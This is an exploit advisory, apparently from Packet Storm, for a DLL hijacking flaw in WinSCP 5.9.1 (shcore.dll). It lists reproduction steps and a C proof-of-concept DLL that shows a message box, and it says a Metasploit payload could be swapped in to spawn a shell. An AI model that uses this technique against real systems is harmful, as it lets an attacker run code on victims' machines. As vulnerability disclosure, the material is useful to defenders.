WinSCP version 5.9.1 suffers from a DLL hijacking vulnerability.
2c331eb656448f5bc8c1847da248cc26185834f1c02580a4b12031193f2198d4# Exploit Title: WinSCP DLL Hijacking Exploit (shcore.dll)
# Date: 03-09-2016
# Author: Ashiyane Digital Security Team
# Vendor Homepage:http://winscp.net/
# Software Link:
http://winscp.net/download/WinSCP-5.9.1-Setup.exe
# Version:5.9.1
# Tested on:Windows 7
# Exploit by : Amir.ght
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
Vuln DLL: shcore.dll
WinSCP is an open source free SFTP client, FTP client, WebDAV client
and SCP client for Windows.
Its main function is file transfer between a local and a remote computer.
WinSCP.exe will search for an load any DLL named "shcore.dll".
If an attacker can place the DLL in a location
where victim open WinSCP.exe it will load and run the attackers DLL
and code.
also can generate a msfpayload DLL and spawn a shell, for example.
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+
# Exploit:
1- Save and compile below C code as 'shcore.dll' to create vuln DLL
2- Place 'shcore.dll' on Same Directory of WinSCP
3- Open WinSCP.exe
//gcc test.c -o shcore.dll -shared
//this dll show a message box
#include <windows.h>
#define DllExport __declspec (dllexport)
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}
int dll_hijack()
{
MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}
#################################
Discovered By : Amir.ght #######
#################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed